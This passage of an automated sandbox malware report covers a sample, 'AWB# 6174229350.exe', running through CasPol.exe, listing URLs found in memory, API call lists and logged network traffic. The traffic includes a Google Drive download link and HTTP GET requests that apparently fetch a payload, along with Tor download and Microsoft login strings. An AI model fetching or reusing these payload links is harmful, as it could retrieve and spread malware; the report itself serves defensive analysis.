            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ancert.com/cps0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
            Source: CasPol.exe, 00000003.00000003.83847950858.0000000020AD0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
            Source: AWB# 6174229350.exeString found in binary or memory: http://www.certum.pl/CPS0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845370957.0000000020B15000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
            Source: CasPol.exe, 00000003.00000003.83844419373.0000000020B2F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83847950858.0000000020AD0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
            Source: CasPol.exe, 00000003.00000003.84840339869.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88255831826.00000000016AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
            Source: CasPol.exe, 00000003.00000003.84840339869.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88255831826.00000000016AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca0f
            Source: CasPol.exe, 00000003.00000003.83847950858.0000000020AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dnie.es/dpc0
            Source: CasPol.exe, 00000003.00000003.83844419373.0000000020B2F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-me.lv/repository0
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
            Source: CasPol.exe, 00000003.00000003.83848350648.0000000020B36000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844419373.0000000020B2F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88290523102.0000000020B36000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.84838110098.0000000020B33000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
            Source: CasPol.exe, 00000003.00000003.83845370957.0000000020B15000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88290004600.0000000020ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.eme.lv/repository0
            Source: CasPol.exe, 00000003.00000003.83847950858.0000000020AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0=
            Source: CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
            Source: CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
            Source: CasPol.exe, 00000003.00000003.83847950858.0000000020AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
            Source: CasPol.exe, 00000003.00000003.83844419373.0000000020B2F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: CasPol.exe, 00000003.00000003.83844927832.0000000020B29000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
            Source: CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/cps/0
            Source: CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ssc.lt/cps03
            Source: CasPol.exe, 00000003.00000002.88290215195.0000000020B15000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845370957.0000000020B15000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
            Source: CasPol.exe, 00000003.00000002.88290215195.0000000020B15000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83845370957.0000000020B15000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
            Source: CasPol.exe, 00000003.00000003.83844261475.0000000020B0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
            Source: CasPol.exe, 00000003.00000003.83845421880.0000000020ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
            Source: CasPol.exe, 00000003.00000003.84840499091.000000001FC42000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.84838384291.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285919605.000000001FC43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www2.public-tru
            Source: CasPol.exe, 00000003.00000003.84838384291.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285610550.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88276453202.000000001DB78000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285512813.000000001FC08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: CasPol.exe, 00000003.00000003.84838384291.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285610550.000000001FC16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i._
            Source: CasPol.exe, 00000003.00000003.84838384291.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285610550.000000001FC16000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88276453202.000000001DB78000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88285512813.000000001FC08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: CasPol.exe, 00000003.00000002.88273977598.000000001DA51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xXsQXu.com
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
            Source: CasPol.exe, 00000003.00000003.83714442349.0000000001707000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83715098913.0000000001707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
            Source: CasPol.exe, 00000003.00000002.88255831826.00000000016AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-00-as-docs.googleusercontent.com/
            Source: CasPol.exe, 00000003.00000003.84840662617.000000000168F000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88255578225.0000000001690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-00-as-docs.googleusercontent.com/%%doc-00-as-docs.googleusercontent.com
            Source: CasPol.exe, 00000003.00000003.83715098913.0000000001707000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.84839767170.0000000001707000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.84839431281.00000000016DC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88256357993.00000000016DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-00-as-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/5qkbcqat
            Source: CasPol.exe, 00000003.00000003.84840662617.000000000168F000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88255578225.0000000001690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 00000003.00000003.84840844954.00000000016A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1OxFTk1n_IftuutTR1RHu7-wEtc6qeE_N
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eca.hinet.net/repository0
            Source: CasPol.exe, 00000003.00000002.88274742011.000000001DAA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: CasPol.exe, 00000003.00000002.88283752082.000000001DF87000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88274742011.000000001DAA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: CasPol.exe, 00000003.00000002.88283752082.000000001DF87000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88274742011.000000001DAA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: CasPol.exe, 00000003.00000002.88283752082.000000001DF87000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.88274742011.000000001DAA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
            Source: CasPol.exe, 00000003.00000003.83845129345.0000000020B2C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83844927832.0000000020B29000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu0
            Source: CasPol.exe, 00000003.00000002.88274742011.000000001DAA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: CasPol.exe, 00000003.00000003.83845171944.0000000020AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
            Source: CasPol.exe, 00000003.00000003.83848101823.0000000020AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.hu/docs/
            Source: CasPol.exe, 00000003.00000003.83847950858.0000000020AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.net/docs
            Source: CasPol.exe, 00000003.00000002.88273977598.000000001DA51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: CasPol.exe, 00000003.00000003.83843658652.0000000020B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OxFTk1n_IftuutTR1RHu7-wEtc6qeE_N HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/5qkbcqatmvl66vlquhfk3geif26gbr2f/1658410125000/11160273513571171813/*/1OxFTk1n_IftuutTR1RHu7-wEtc6qeE_N?e=download&uuid=bec227ee-0406-4da7-b66d-39be02ab3f2d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-as-docs.googleusercontent.comConnection: Keep-Alive
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_004054B6 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
            Source: AWB# 6174229350.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeFile created: C:\Windows\resources\0409Jump to behavior
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_0040727F
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_00406AA8
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_6FCB1B28
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB4A72
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB2BBD
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA3CFA
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA504E
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAF6A1
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA02A6
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA0EBE
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AABE86
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA769E
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB2E8
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB42E3
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA02FA
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA66FA
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA06C2
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA62DE
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA0228
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA6200
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA0E1F
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA6210
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA0616
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA0E16
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA7E6E
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA0661
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA0E66
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA7648
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA7646
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB25E
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA039B
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA0398
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB7FE3
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB7C8
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA03CC
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB3CC
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA032C
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAAF32
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB71E
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB71C
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA7F1C
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB3360
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAAF7A
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA0776
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB7376
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA0743
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB58A6
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB84B3
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA7CB4
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA0488
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB6C98
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAAC9E
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA7CEE
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA04E5
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA1CCD
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA8029
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA0438
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA083F
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA4834
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA8003
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB5069
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB062
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA6470
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AB5C40
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA105F
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AAB9AC
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA09A1
            Source: C:\Users\user\Desktop\AWB# 6174229350.exeCode function: 1_2_02AA0183
